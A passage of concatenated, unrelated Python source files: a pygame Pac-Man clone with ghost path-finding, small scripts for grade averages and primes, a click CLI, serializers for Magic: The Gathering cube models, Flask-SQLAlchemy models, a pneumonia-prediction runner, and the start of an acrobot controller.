    Solid cells register themselves in the global `walls` list; every cell
    (solid or frontier marker) is indexed in `frontierdisplay` by str(pos)
    so path-finding visualisation can look up its rect.
    """

    def __init__(self, pos, frontier=False):
        if not frontier:
            walls.append(self)
        frontierdisplay[str(pos)] = self
        self.rect = pygame.Rect(pos[0], pos[1], 20, 20)
class Point:
    """Edible pellet; registers its centre (top-left + 10px) in the global list."""

    def __init__(self, pos):
        centre = (pos[0] + 10, pos[1] + 10)
        points.append(centre)
class PowerPoint:
    """Power pellet; registers its raw grid position in the global list."""

    def __init__(self, pos):
        powerpoints.append(pos)
def resource_path(relative):
    """Resolve *relative* against the PyInstaller bundle dir when frozen,
    otherwise return it unchanged (relative to the working directory)."""
    bundle_dir = getattr(sys, "_MEIPASS", None)
    if bundle_dir is not None:
        return os.path.join(bundle_dir, relative)
    return os.path.join(relative)
def flatten(seq, container=None):
    """Recursively flatten nested iterables in *seq* into a flat list.

    Strings/bytes are treated as atoms: the original recursed into them,
    which never terminated because every 1-character string is itself
    iterable. Passing an existing *container* appends into it and returns it.
    """
    if container is None:
        container = []
    for element in seq:
        if hasattr(element, '__iter__') and not isinstance(element, (str, bytes)):
            flatten(element, container)
        else:
            container.append(element)
    return container
def pause():
    """Block until P is pressed again; ESC or closing the window quits the game."""
    # Debounce: swallow the P press that triggered the pause.
    time.sleep(1)
    while True:
        for e in pygame.event.get():
            if e.type == pygame.QUIT:
                pygame.display.quit()
                pygame.quit()
                sys.exit()
                running = False  # NOTE(review): unreachable after sys.exit()
        key = pygame.key.get_pressed()
        if key[pygame.K_ESCAPE]:
            pygame.display.quit()
            pygame.quit()
            sys.exit()
        if key[pygame.K_p]:
            return
# --- One-time pygame and level setup; runs at import time. ---
pygame.init()
pygame.display.set_caption("PATMAN")
global screen  # NOTE(review): `global` at module level is a no-op
screen = pygame.display.set_mode((420, 420))
global waca
# NOTE(review): not routed through resource_path(), unlike the other assets.
waca = pygame.mixer.Sound("data/Waca.wav")
game = Game()
global walls
walls = []          # solid Wall instances (collision)
global points
points = []         # pellet centre coordinates
global powerpoints
powerpoints = []    # power-pellet positions
global ghosts
ghosts = []         # Ghost instances (self-registered)
global frontierdisplay
frontierdisplay = {}  # str(pos) -> Wall, for path/frontier drawing
size = 20
player = Player(size)
player.rect.x = 20
player.rect.y = 20
# Parse the ASCII map: W=wall, T=teleporter, P=pellet, G=ghost spawn, B=power pellet.
# NOTE(review): the file handle is never closed.
level = open(resource_path(os.path.join('data', "MAP.patlayout")))
middle = []  # the ghost-house cells around each ghost spawn
x = y = 0
teleportcoords = []
xcount = ycount = 0
for row in level:
    for col in row:
        if col == "W":
            Wall((x, y))
        else:
            # Non-wall cells still get a frontier marker for path drawing.
            Wall((x, y), True)
        if col == "T":
            teleportcoords.append([xcount * 2 * 10, ycount * 2 * 10])
        elif col == "P":
            Point((x, y))
        elif col == "G":
            Ghost((x, y))
            # The 3x3 block of cells around the spawn counts as the ghost house.
            middle.append((x, y))
            middle.append((x-10, y))
            middle.append((x, y-10))
            middle.append((x-10, y-10))
            middle.append((x+10, y))
            middle.append((x, y+10))
            middle.append((x+10, y+10))
            middle.append((x+10, y-10))
            middle.append((x-10, y+10))
        elif col == "B":
            PowerPoint((x, y));
        x += 20
        xcount += 1
    xcount = 0
    y += 20
    x = 0
    ycount += 1
def Main():
    """Run one round of PATMAN; returns when the player is caught or has eaten
    every pellet. Uses the module-level state set up at import time
    (screen, walls, points, powerpoints, ghosts, player, game, ...).
    """
    pointlength = len(points)
    for ghost in ghosts:
        # Ghosts need the tunnel coordinates for their move() logic.
        ghost.teleportcoords = teleportcoords

    # --- Sprite loading / scaling ---
    patman_closed = pygame.image.load(resource_path(os.path.join('data', 'patman.png')))
    patman_closed = pygame.transform.scale(patman_closed, (size, size))
    patman_closed_flipped = pygame.transform.flip(patman_closed, True, False)
    patman_open = pygame.image.load(resource_path(os.path.join('data', 'patman_open.png')))
    patman_open = pygame.transform.scale(patman_open, (size, size))
    patman_open_flipped = pygame.transform.flip(patman_open, True, False)
    ghost_images = []
    for sprite_name in ('ghost1.png', 'ghost2.png', 'ghost3.png', 'ghost4.png'):
        raw = pygame.image.load(resource_path(os.path.join('data', sprite_name)))
        ghost_images.append(pygame.transform.scale(raw, (size, size)))
    # (The scared-ghost sprite and its rendering path were dead, commented-out
    # code and have been removed.)

    mouth_open = False
    flipped = False
    scoreText = pygame.font.SysFont("monospace", 15)
    x = 1          # frame flag, reused as the ghost index in the blit loop (kept from original)
    ghostinc = 0   # frame counter; ghosts only recalculate every other frame
    sleep = 0.06
    landscape = Graph(open(resource_path(os.path.join('data', "MAP.patlayout"))), 20)
    print(" >> Graph created")

    def probe_direction(dx, dy, new_direction):
        """Adopt *new_direction* only if one step that way is not wall-blocked."""
        player.rect.x += dx
        player.rect.y += dy
        blocked = any(player.rect.colliderect(wall.rect) for wall in walls)
        player.rect.x -= dx
        player.rect.y -= dy
        if not blocked:
            player.direction = new_direction

    running = True
    while running:
        # Any ghost touching the player ends the round.
        for ghost in ghosts:
            if game.check(player, ghost) == False:
                running = False

        for e in pygame.event.get():
            if e.type == pygame.QUIT:
                pygame.display.quit()
                pygame.quit()
                sys.exit()

        key = pygame.key.get_pressed()
        if key[pygame.K_ESCAPE]:
            pygame.display.quit()
            pygame.quit()
            sys.exit()
        if key[pygame.K_p]:
            pause()
            time.sleep(1)

        # Queue a turn; it only takes effect when the adjacent cell is free.
        if key[pygame.K_UP]:
            probe_direction(0, -10, 0)
        if key[pygame.K_DOWN]:
            probe_direction(0, 10, 1)
        if key[pygame.K_LEFT]:
            probe_direction(-10, 0, 2)
        if key[pygame.K_RIGHT]:
            probe_direction(10, 0, 3)

        # Advance one step in the current direction (0=up, 1=down, 2=left, 3=right).
        if player.direction == 0:
            player.move(-10, 0, teleportcoords)
        if player.direction == 1:
            player.move(10, 0, teleportcoords)  # original wrote `--10`, i.e. +10
        if player.direction == 2:
            flipped = True
            player.move(0, -10, teleportcoords)
        if player.direction == 3:
            flipped = False
            player.move(0, 10, teleportcoords)

        screen.fill((0, 0, 0))

        colours = [(246, 0, 0), (249, 141, 0), (244, 145, 207), (70, 251, 244)]
        for ghost in ghosts:
            # Recompute and apply ghost movement only every other frame.
            if x > 0 and ghostinc % 2 == 0:
                ghost.previouspos = (ghost.rect.x, ghost.rect.y)
                next_coord = ghost.pursue((player.rect.x, player.rect.y), landscape, middle)
                # Visualise the planned path in this ghost's colour.
                for coord in next_coord:
                    try:
                        pygame.draw.rect(screen, colours[ghosts.index(ghost)],
                                         frontierdisplay[str(coord)].rect)
                    except (KeyError, IndexError):
                        # Off-grid coord (e.g. corner target) or more than 4 ghosts.
                        pass
                if len(next_coord) > 1:
                    next_coord = next_coord[1]  # first step along the path
                elif len(next_coord) == 1:
                    if not ghost.corner:
                        # Degenerate path: snap straight onto the player.
                        next_coord = (player.rect.x, player.rect.y)
                    else:
                        next_coord = next_coord[0]
                else:
                    next_coord = (ghost.rect.x, ghost.rect.y)
                ghost.rect.x = next_coord[0]
                ghost.rect.y = next_coord[1]

        for wall in walls:
            pygame.draw.rect(screen, (0, 0, 255), wall.rect)

        # Eat / draw pellets. Rebuilding the list avoids the original's
        # pop-while-iterating with a drifting index, which skipped elements.
        remaining = []
        for point in points:
            if player.rect.x == point[0] - 10 and player.rect.y == point[1] - 10:
                game.points += 1  # eaten: drop it and score
            else:
                if point[0] == 0 and point[1] == 0:
                    pygame.draw.circle(screen, (255, 0, 0), point, 3)
                else:
                    pygame.draw.circle(screen, (255, 255, 255), point, 3)
                remaining.append(point)
        points[:] = remaining  # slice-assign: `points` is shared module state

        remaining = []
        for powerpoint in powerpoints:
            # BUG FIX: the original read `powerpoint[1] - s10` (NameError).
            # `10` mirrors the pellet hit-test above -- confirm intended hitbox.
            if player.rect.x == powerpoint[0] - 10 and player.rect.y == powerpoint[1] - 10:
                pass  # eaten: drop it (power pellets score nothing yet)
            else:
                pygame.draw.circle(screen, (255, 255, 255), powerpoint, 5)
                remaining.append(powerpoint)
        powerpoints[:] = remaining

        x = 1
        for ghost in ghosts:
            if 1 <= x <= len(ghost_images):
                screen.blit(ghost_images[x - 1], ghost.rect)
            x += 1

        labelScore = scoreText.render("Score: " + str(game.points), 1, (0, 0, 0))
        screen.blit(labelScore, (0, -4))

        # Chomp animation: alternate open/closed sprites every frame,
        # mirrored when heading left.
        if mouth_open:
            screen.blit(patman_open_flipped if flipped else patman_open, player.rect)
        else:
            screen.blit(patman_closed_flipped if flipped else patman_closed, player.rect)
        mouth_open = not mouth_open

        pygame.display.flip()
        if len(points) == 0:
            running = False  # every pellet eaten: round won

        x += 1
        ghostinc += 1
        if ghostinc % 2 == 0:
            time.sleep(sleep)
            pygame.mixer.Sound.play(waca)
            time.sleep(sleep)
        # Speed the game up as the score climbs.
        sleep = abs((pointlength - game.points / 2) / 5000)
    pygame.display.flip()
# Restart forever: Main() returns when a round ends (player caught or all
# pellets eaten), after which a fresh round begins with the remaining state.
while True:
    Main()
|
# Read n students, each as "<name> <grade> <grade> ...", then print the
# average grade of the queried student to two decimals.
n = int(input())
records = {}
for _ in range(n):
    student = input().split()
    records[student[0]] = [float(i) for i in student[1:]]

name = input()
grades = records[name]
# Generalized: the original divided by a hard-coded 3, which silently
# miscomputed the average whenever a student had a different grade count.
avg = sum(grades) / len(grades)
print("{:.2f}".format(avg))
|
from json import load
from operator import itemgetter
from pathlib import Path
from pprint import pprint

from click import argument, group, option, pass_context
from click_pathlib import Path as ClickPath

from kirby_transform import Processor
@group()
# BUG FIX: this was declared with @argument, but click arguments accept
# neither option-style names ("-f"/"--...") nor `help`; additionally the
# declared name `file_path` did not match the callback parameter `path`,
# which made click raise a TypeError on invocation.
@option("-f", "--path", "path",
        type=ClickPath(exists=True, file_okay=True, dir_okay=True),
        help="Dir or file to test on")
@pass_context
def cli(ctx, path: Path) -> None:
    """Collect the JSON file(s) under *path* and stash them on the context."""

    def return_data(file: Path) -> dict:
        # Load one JSON payload from disk.
        with open(file) as fp:
            return load(fp)

    if path.is_dir():
        files_to_test = [dict(filename=x.name,
                              data=return_data(x)) for x in (path.glob("*.json"))]
    elif path.is_file():
        files_to_test = [dict(filename=path.name,
                              data=return_data(path))]
    else:
        # BUG FIX: the message previously interpolated the *class* `Path`
        # instead of the offending value.
        raise OSError(f" {path} wasn't a file or dir")  # shouldn't happen
    # NOTE(review): ad-hoc attributes on the click Context work, but ctx.obj
    # is the idiomatic place for shared state; kept for compatibility with
    # the ci_check subcommand, which reads ctx.files.
    ctx.files = files_to_test
@cli.command(name="ci_check",
             help="Prints the standard processed output data, will return 1 for failure for use with CI")
# BUG FIX: this was declared with @argument, but click arguments accept
# neither option-style names nor `help`; a boolean switch is an option flag.
@option('-s', '--supress_output', is_flag=True, default=False, show_default=True,
        help="Don't print the output if succesful, just return exit code 0")
@pass_context
def stdout(ctx, supress_output: bool) -> None:
    """Return 0 (success) or 1 (failure) for use with CI"""
    for path_name, data in map(itemgetter('filename', 'data'), ctx.files):
        try:
            processed = Processor().process(data)
            if not supress_output:
                pprint(data)
            if len(processed.data) == 0:
                raise ValueError("No data returned")
        except Exception:
            # BUG FIX: the original built this f-string and discarded it
            # (a bare expression); actually print it before re-raising.
            print(f"Failed on file {path_name} \n {data} \n")
            raise
    exit(0)
|
def prime_number_gen(n):
    """
    Return every prime in [0, n] as a list.

    Error reporting follows the original contract: non-int input yields the
    string 'Only Numbers allowed', negative input yields
    'Only Positive Numbers allowed' (strings, not exceptions).
    :param n:
    :return [prime numbers between 0 and n]:
    """

    def is_prime(num):
        """
        True when the odd number *num* has no odd divisor in [3, sqrt(num)].
        :param num:
        :return bool:
        """
        return all(num % divisor for divisor in range(3, int(num ** 0.5) + 1, 2))

    if type(n) != int:
        return 'Only Numbers allowed'
    if n < 0:
        return 'Only Positive Numbers allowed'
    if n <= 1:
        return []
    # 2 is the only even prime; afterwards only odd candidates are tested.
    primes_list = [2]
    primes_list.extend(candidate for candidate in range(3, n + 1, 2) if is_prime(candidate))
    return primes_list
def main():
    """Print the full list of primes up to one million."""
    print(prime_number_gen(1000000))


if __name__ == '__main__':
    main()
|
import typing as t
from abc import abstractmethod
from distutils.util import strtobool
from rest_framework.request import Request
from mtgorp.models.collections.deck import Deck
from mtgorp.models.persistent.card import Card
from mtgorp.models.persistent.cardboard import Cardboard
from mtgorp.models.persistent.expansion import Expansion
from mtgorp.models.persistent.printing import Printing
from mtgorp.models.serilization.serializeable import compacted_model
from mtgorp.models.serilization.strategies.jsonid import JsonId
from mtgorp.models.serilization.strategies.raw import RawStrategy
from magiccube.collections.cube import Cube
from magiccube.collections.cubeable import BaseCubeable, FlatBaseCubeable, Cubeable, CardboardCubeable
from magiccube.collections.fantasysets import FantasySet
from magiccube.collections.infinites import Infinites
from magiccube.collections.laps import TrapCollection
from magiccube.collections.meta import MetaCube
from magiccube.collections.nodecollection import NodeCollection, ConstrainedNode, GroupMap
from magiccube.laps.purples.purple import BasePurple, Purple, CardboardPurple
from magiccube.laps.tickets.ticket import BaseTicket, Ticket, CardboardTicket
from magiccube.laps.traps.trap import BaseTrap, Trap, CardboardTrap
from magiccube.laps.traps.tree.printingtree import BaseNode
from magiccube.update import cubeupdate
from magiccube.update.report import UpdateReport, ReportNotification
from api.values import Releasable
T = t.TypeVar('T')
# strftime format applied to serialized dates (see ExpansionSerializer).
# NOTE(review): '%M' is strftime's *minutes* field, so this renders
# "<year> <minute>/<day>". '%m' (month) was probably intended — confirm
# with the frontend consumers before changing, as clients may parse this.
DATETIME_FORMAT = '%Y %M/%d'
class ModelSerializer(t.Generic[T]):
    """Abstract base for serializers turning a model instance into a compacted dict."""

    @classmethod
    @abstractmethod
    def serialize(cls, serializeable: T) -> compacted_model:
        """Serialize *serializeable* into a plain, JSON-friendly structure."""
        pass
class PrintingIdSerializer(object):
    """Serialize a printing as nothing but its integer primary key."""

    @classmethod
    def serialize(cls, printing: Printing) -> int:
        return printing.id
class CardboardIdSerializer(object):
    """Serialize a cardboard as its name, which doubles as its id."""

    @classmethod
    def serialize(cls, cardboard: Cardboard) -> str:
        return cardboard.name
class ExpansionSerializer(ModelSerializer[Expansion]):
    """Serialize an expansion to a flat client-facing dict."""

    @classmethod
    def serialize(cls, expansion: Expansion) -> compacted_model:
        block = expansion.block
        return {
            'code': expansion.code,
            'name': expansion.name,
            'block': block.name if block is not None else None,
            'release_date': expansion.release_date.strftime(DATETIME_FORMAT),
            'type': 'expansion',
            'id': expansion.code,
        }
class MinimalPrintingSerializer(ModelSerializer[Printing]):
    """Serialize only a printing's display name and id."""

    @classmethod
    def serialize(cls, printing: Printing) -> compacted_model:
        return {'name': printing.cardboard.name, 'id': printing.id}
class PrintingSerializer(ModelSerializer[Printing]):
    """Serialize a printing with the card facts needed by list/search views."""

    @classmethod
    def serialize(cls, printing: Printing) -> compacted_model:
        front = printing.cardboard.front_card
        return {
            'id': printing.id,
            'name': printing.cardboard.name,
            'cmc': front.cmc,
            'expansion_code': printing.expansion.code,
            'color': [color.letter_code for color in front.color],
            'types': [card_type.name for card_type in front.type_line.types],
            'type': 'printing',
            'cardboard_cubeable_id': printing.cardboard.id,
        }
class CardSerializer(ModelSerializer[Card]):
    """Serialize one card face: text, cost, colors, types, P/T and loyalty."""

    @classmethod
    def serialize(cls, card: Card) -> compacted_model:
        mana_cost = card.mana_cost
        power_toughness = card.power_toughness
        return {
            'name': card.name,
            'id': card.name,
            'oracle_text': card.oracle_text,
            'mana_cost': None if mana_cost is None else {
                'str': str(mana_cost),
                'atoms': [atom.code for atom in mana_cost],
            },
            'cmc': card.cmc,
            'color': [color.letter_code for color in card.color],
            'type_line': {
                'types': [card_type.name for card_type in card.type_line.types],
                'line': str(card.type_line),
            },
            'power_toughness': None if power_toughness is None else {
                'power': str(power_toughness.power),
                'toughness': str(power_toughness.toughness),
                'str': str(power_toughness),
            },
            'loyalty': str(card.loyalty),
        }
class CardboardSerializer(ModelSerializer[Cardboard]):
    """Serialize a cardboard with fully serialized front and back faces."""

    @classmethod
    def serialize(cls, cardboard: Cardboard) -> compacted_model:
        return {
            'name': cardboard.name,
            'id': cardboard.name,
            'front_cards': list(map(CardSerializer.serialize, cardboard.front_cards)),
            'back_cards': list(map(CardSerializer.serialize, cardboard.back_cards)),
            'layout': cardboard.layout.name,
            'type': 'cardboard',
        }
class MinimalCardboardSerializer(ModelSerializer[Cardboard]):
    """Serialize only a cardboard's name (which doubles as its id)."""

    @classmethod
    def serialize(cls, cardboard: Cardboard) -> compacted_model:
        return {'name': cardboard.name, 'id': cardboard.name}
class FullPrintingSerializer(ModelSerializer[Printing]):
    """Serialize a printing with its expansion and cardboard fully expanded."""

    @classmethod
    def serialize(cls, printing: Printing) -> compacted_model:
        cardboard = printing.cardboard
        return {
            'id': printing.id,
            'name': cardboard.name,
            'expansion': ExpansionSerializer.serialize(printing.expansion),
            'cardboard': CardboardSerializer.serialize(cardboard),
            'type': printing.__class__.__name__,
            'cardboard_cubeable_id': cardboard.id,
        }
class NodeSerializer(ModelSerializer[BaseNode]):
    """Recursively serialize a printing-tree node and its weighted children."""

    @classmethod
    def _serialize_child(cls, child: BaseCubeable) -> compacted_model:
        # Leaves are printings or cardboards; anything else is a nested node.
        if isinstance(child, Printing):
            return PrintingSerializer.serialize(child)
        if isinstance(child, Cardboard):
            return CardboardSerializer.serialize(child)
        return cls.serialize(child)

    @classmethod
    def serialize(cls, printing_node: BaseNode) -> compacted_model:
        children = [
            (cls._serialize_child(child), multiplicity)
            for child, multiplicity in printing_node.children.items()
        ]
        return {
            'type': printing_node.__class__.__name__,
            'children': children,
            'id': printing_node.persistent_hash(),
        }
class TrapSerializer(ModelSerializer[BaseTrap]):
    """Serialize a trap; printing-backed traps also carry their cardboard-level id."""

    @classmethod
    def serialize(cls, trap: BaseTrap) -> compacted_model:
        serialized = {
            'id': trap.persistent_hash(),
            'node': NodeSerializer.serialize(trap.node),
            'intention_type': trap.intention_type.name,
            'type': 'trap',
            'string_representation': trap.node.get_minimal_string(identified_by_id=False),
        }
        if isinstance(trap, Trap):
            serialized['cardboard_cubeable_id'] = trap.as_cardboards.id
        return serialized
class TicketSerializer(ModelSerializer[BaseTicket]):
    """Serialize a ticket and its options; printing-backed tickets carry a cardboard id."""

    @classmethod
    def _serialize_option(cls, option: FlatBaseCubeable) -> t.Any:
        # Options are either printings or cardboards.
        if isinstance(option, Printing):
            return PrintingSerializer.serialize(option)
        return CardboardSerializer.serialize(option)

    @classmethod
    def serialize(cls, ticket: BaseTicket) -> compacted_model:
        serialized = {
            'options': [cls._serialize_option(option) for option in ticket.options],
            'name': ticket.name,
            'id': ticket.persistent_hash(),
            'type': 'ticket',
        }
        if isinstance(ticket, Ticket):
            serialized['cardboard_cubeable_id'] = ticket.as_cardboards.id
        return serialized
class PurpleSerializer(ModelSerializer[BasePurple]):
    """Serialize a purple; its name doubles as its cardboard-level id."""

    @classmethod
    def serialize(cls, purple: BasePurple) -> compacted_model:
        name = purple.name
        return {
            'name': name,
            'id': purple.persistent_hash(),
            'description': purple.description,
            'type': 'purple',
            'cardboard_cubeable_id': name,
        }
class CubeSerializer(ModelSerializer[Cube]):
    """Serialize a cube's printings, traps, tickets and purples with multiplicities."""

    @classmethod
    def serialize(cls, cube: Cube) -> compacted_model:
        def pairs(counter, serializer):
            # (serialized item, multiplicity) tuples for one multiset of cubeables.
            return [(serializer(item), multiplicity) for item, multiplicity in counter.items()]

        return {
            'printings': pairs(cube.printings, PrintingSerializer.serialize),
            'traps': pairs(cube.traps, TrapSerializer.serialize),
            'tickets': pairs(cube.tickets, TicketSerializer.serialize),
            'purples': pairs(cube.purples, PurpleSerializer.serialize),
            'type': 'cube',
        }
class FantasySetSerializer(ModelSerializer[FantasySet]):
    """Serialize a fantasy set as a map from rarity to its serialized cube."""

    @classmethod
    def serialize(cls, serializeable: FantasySet) -> compacted_model:
        rarities = {
            rarity: CubeSerializer.serialize(cube)
            for rarity, cube in serializeable.rarity_map.items()
        }
        return {'rarities': rarities, 'type': 'fantasy_set'}
class ConstrainedNodeOrpSerializer(ModelSerializer[ConstrainedNode]):
    """Serialize a constrained node: hash id, value, groups and the inner node."""

    @classmethod
    def serialize(cls, constrained_node: ConstrainedNode) -> compacted_model:
        return {
            'id': constrained_node.persistent_hash(),
            'value': constrained_node.value,
            'groups': list(constrained_node.groups),
            'node': NodeSerializer.serialize(constrained_node.node),
        }
class ConstrainedNodesOrpSerializer(ModelSerializer[NodeCollection]):
    """Serialize a node collection as (serialized node, multiplicity) pairs."""

    @classmethod
    def serialize(cls, constrained_nodes: NodeCollection) -> compacted_model:
        return {
            'nodes': [
                (ConstrainedNodeOrpSerializer.serialize(node), multiplicity)
                for node, multiplicity in constrained_nodes.items()
            ]
        }
class CubePatchOrpSerializer(ModelSerializer[cubeupdate.CubePatch]):
    """Serialize a cube patch: the cubeable delta plus the constrained-node delta."""

    @classmethod
    def serialize(cls, cube_patch: cubeupdate.CubePatch) -> compacted_model:
        delta = cube_patch.cube_delta_operation
        # Note: the delta's cubeable attributes iterate as pairs directly
        # (no .items()), unlike the node delta below.
        cube_delta = {
            'printings': [
                (PrintingSerializer.serialize(printing), multiplicity)
                for printing, multiplicity in delta.printings
            ],
            'traps': [
                (TrapSerializer.serialize(trap), multiplicity)
                for trap, multiplicity in delta.traps
            ],
            'tickets': [
                (TicketSerializer.serialize(ticket), multiplicity)
                for ticket, multiplicity in delta.tickets
            ],
            'purples': [
                (PurpleSerializer.serialize(purple), multiplicity)
                for purple, multiplicity in delta.purples
            ],
        }
        node_delta = [
            (ConstrainedNodeOrpSerializer.serialize(node), multiplicity)
            for node, multiplicity in cube_patch.node_delta_operation.nodes.items()
        ]
        return {'cube_delta': cube_delta, 'node_delta': node_delta}
class CubeChangeSerializer(ModelSerializer[cubeupdate.CubeChange]):
    """Serialize one cube change, including its JSON payload and category."""

    @classmethod
    def serialize(cls, serializeable: cubeupdate.CubeChange) -> compacted_model:
        change = serializeable
        return {
            'type': change.__class__.__name__,
            'id': change.persistent_hash(),
            'explanation': change.explain(),
            'content': JsonId.serialize(change),
            'category': change.category.value,
        }
class GroupMapSerializer(ModelSerializer[GroupMap]):
    """Serialize a group map as a plain dict of its groups."""

    @classmethod
    def serialize(cls, serializeable: GroupMap) -> compacted_model:
        return {'groups': dict(serializeable.groups)}
class VerbosePatchSerializer(ModelSerializer[cubeupdate.VerboseCubePatch]):
    """Serialize a verbose patch as [serialized change, multiplicity] pairs."""

    @classmethod
    def serialize(cls, serializeable: cubeupdate.VerboseCubePatch) -> compacted_model:
        changes = [
            [CubeChangeSerializer.serialize(change), multiplicity]
            for change, multiplicity in serializeable.changes.items()
        ]
        return {'changes': changes}
class UpdateNotificationSerializer(ModelSerializer[ReportNotification]):
    """Serialize a report notification: title, body and severity level."""

    @classmethod
    def serialize(cls, serializeable: ReportNotification) -> compacted_model:
        notification = serializeable
        return {
            'title': notification.title,
            'content': notification.content,
            'level': notification.notification_level.value,
        }
class UpdateReportSerializer(ModelSerializer[UpdateReport]):
    """Serialize an update report as its list of serialized notifications."""

    @classmethod
    def serialize(cls, serializeable: UpdateReport) -> compacted_model:
        return {
            'notifications': list(
                map(UpdateNotificationSerializer.serialize, serializeable.notifications)
            )
        }
class TrapCollectionSerializer(ModelSerializer[TrapCollection]):
    """Serialize a trap collection as (serialized trap, multiplicity) pairs."""

    @classmethod
    def serialize(cls, serializeable: TrapCollection) -> compacted_model:
        return {
            'traps': [
                (TrapSerializer.serialize(trap), count)
                for trap, count in serializeable.traps.items()
            ]
        }
class DeckSerializer(ModelSerializer[Deck]):
    """Serialize a deck's maindeck and sideboard as (printing, multiplicity) pairs."""

    @classmethod
    def serialize(cls, serializeable: Deck) -> compacted_model:
        def pairs(board):
            # (serialized printing, multiplicity) for one board of the deck.
            return [
                (PrintingSerializer.serialize(printing), count)
                for printing, count in board.items()
            ]

        return {
            'maindeck': pairs(serializeable.maindeck),
            'sideboard': pairs(serializeable.sideboard),
        }
class InfinitesSerializer(ModelSerializer[Infinites]):
    """Serialize infinites as a list of serialized cardboards."""

    @classmethod
    def serialize(cls, serializeable: Infinites) -> compacted_model:
        return {
            'cardboards': list(map(CardboardSerializer.serialize, serializeable))
        }
class MetaCubeSerializer(ModelSerializer[MetaCube]):
    """Serialize a meta cube: cube, node collection, group map and infinites."""

    @classmethod
    def serialize(cls, serializeable: MetaCube) -> compacted_model:
        meta = serializeable
        return {
            'cube': CubeSerializer.serialize(meta.cube),
            'nodes': ConstrainedNodesOrpSerializer.serialize(meta.node_collection),
            'group_map': GroupMapSerializer.serialize(meta.group_map),
            'infinites': InfinitesSerializer.serialize(meta.infinites),
        }
class MappedSerializer(ModelSerializer[T]):
    """Dispatch serialization on the concrete class of *serializeable*.

    Subclasses provide ``_serializer_map`` keyed by ``__name__``. When the
    request carries a truthy ``?native=`` query parameter, the raw/compact
    representation is returned instead of the mapped one.
    """
    _serializer_map: t.Mapping[str, t.Type[ModelSerializer]]

    # Accepted spellings, matching distutils.util.strtobool exactly.
    _TRUTHY = frozenset(('y', 'yes', 't', 'true', 'on', '1'))
    _FALSY = frozenset(('n', 'no', 'f', 'false', 'off', '0'))

    @classmethod
    def _strtobool(cls, value: str) -> int:
        """Drop-in replacement for distutils.util.strtobool.

        distutils is deprecated since 3.10 and removed in Python 3.12, so the
        semantics (1/0 return, ValueError on anything else) are inlined here.
        """
        value = value.lower()
        if value in cls._TRUTHY:
            return 1
        if value in cls._FALSY:
            return 0
        raise ValueError('invalid truth value {!r}'.format(value))

    @classmethod
    def serialize(cls, serializeable: T, request: t.Optional[Request] = None) -> compacted_model:
        if request is not None and cls._strtobool(request.query_params.get('native', '0')):
            return (
                serializeable.id
                if isinstance(serializeable, (Printing, Cardboard))
                else RawStrategy.serialize(serializeable)
            )
        return cls._serializer_map[serializeable.__class__.__name__].serialize(serializeable)
class CubeableSerializer(MappedSerializer[Cubeable]):
    """Dispatch table for printing-level cubeables."""
    # Keyed by concrete class name, looked up in MappedSerializer.serialize.
    _serializer_map: t.Mapping[str, t.Type[ModelSerializer]] = {
        Printing.__name__: PrintingSerializer,
        Trap.__name__: TrapSerializer,
        Ticket.__name__: TicketSerializer,
        Purple.__name__: PurpleSerializer,
    }
class CardboardCubeableSerializer(MappedSerializer[CardboardCubeable]):
    """Dispatch table for cardboard-level cubeables.

    The cardboard variants reuse the printing-level trap/ticket/purple
    serializers, which handle both via isinstance checks.
    """
    _serializer_map: t.Mapping[str, t.Type[ModelSerializer]] = {
        Cardboard.__name__: CardboardSerializer,
        CardboardTrap.__name__: TrapSerializer,
        CardboardTicket.__name__: TicketSerializer,
        CardboardPurple.__name__: PurpleSerializer,
    }
class ReleasableSerializer(MappedSerializer[Releasable]):
    """Dispatch table for releasable collections (cubes and fantasy sets)."""
    _serializer_map = {
        Cube.__name__: CubeSerializer,
        FantasySet.__name__: FantasySetSerializer,
    }
|
# The flask.ext.* import namespace was removed in Flask 1.0; extensions are
# imported under their own package name now.
from flask_sqlalchemy import SQLAlchemy

db = SQLAlchemy()

# Association table backing the many-to-many User <-> Group relationship.
user_group = db.Table('user_group',
    db.Column('userid', db.String(30), db.ForeignKey('user.userid')),
    db.Column('group_name', db.String(30), db.ForeignKey('group.name'))
)
class User(db.Model):
    """A user keyed by *userid*, linked many-to-many to groups."""
    userid = db.Column(db.String(30), primary_key=True)
    first_name = db.Column(db.String(30))
    last_name = db.Column(db.String(30))
    # Many-to-many via the user_group association table; the backref exposes
    # a lazy 'users' query on Group.
    groups = db.relationship('Group', secondary=user_group,
                             backref=db.backref('users', lazy='dynamic'))
    def __init__(self, userid, first_name, last_name):
        self.userid = userid
        self.first_name = first_name
        self.last_name = last_name
class Group(db.Model):
    """A group keyed by its (unique) name; members come via User.groups."""
    name = db.Column(db.String(30), primary_key=True)
    def __init__(self, name):
        self.name = name
|
from cnn_model import PneumoniaPrediction
import argparse
import logging
if __name__ == "__main__":
    # Configure logging so the INFO messages below are actually emitted
    # (the root logger defaults to WARNING and would swallow them).
    logging.basicConfig(level=logging.INFO)
    logging.info('Starting model...')

    # Parse CLI arguments once (the original called parse_args() twice).
    parser = argparse.ArgumentParser()
    parser.add_argument('--img_path', type=str)
    parser.add_argument('--model_path', type=str)
    args = parser.parse_args()

    # Build the classifier once (the original instantiated it twice,
    # discarding the first instance) and load the trained weights.
    clf = PneumoniaPrediction()
    clf.load_model(args.model_path)

    img = clf.load_img(args.img_path)          # prepare the image to predict
    prediction = clf.predict(img)              # returns probability of pneumonia
    logging.info('Probability of Pneumonia: %s', round(prediction, 2))
|
# -*- coding: utf-8 -*-
'''
@author: 程哲
@contact: 909991719@qq.com
@file: 虚约束控制.py
@time: 2017/11/18 14:46
'''
import gym
import matplotlib.pyplot as plt
import numpy as np
import pickle
from numpy import pi,sin,cos
from math import atan
from collections import deque
#虚约束控制函数
class CONTROL:
    """Virtual-holonomic-constraint controller for a two-link acrobot.

    Drives the system toward the target posture (theta1d, theta2d) by
    enforcing the virtual constraint theta1 = a * theta2 + b through the
    torque law in Torque().
    """
    # System parameters: link lengths, masses, CoM positions, inertias,
    # and joint friction coefficients (MU*1 viscous, MU*2 Coulomb).
    LINK_LENGTH_1 = 0.593
    LINK_LENGTH_2 = 0.593
    LINK_MASS_1 = 2.78
    LINK_MASS_2 = 1.73
    LINK_COM_POS_1 = 0.3
    LINK_MOI1 = 0.25
    LINK_COM_POS_2 = 0.4
    LINK_MOI2 = 0.116
    MU11 = 0.205
    MU12 = 0.184
    MU21 = 0.93
    MU22 = 1.07
    g = 9.81
    # Lumped dynamic coefficients of the two-link model.
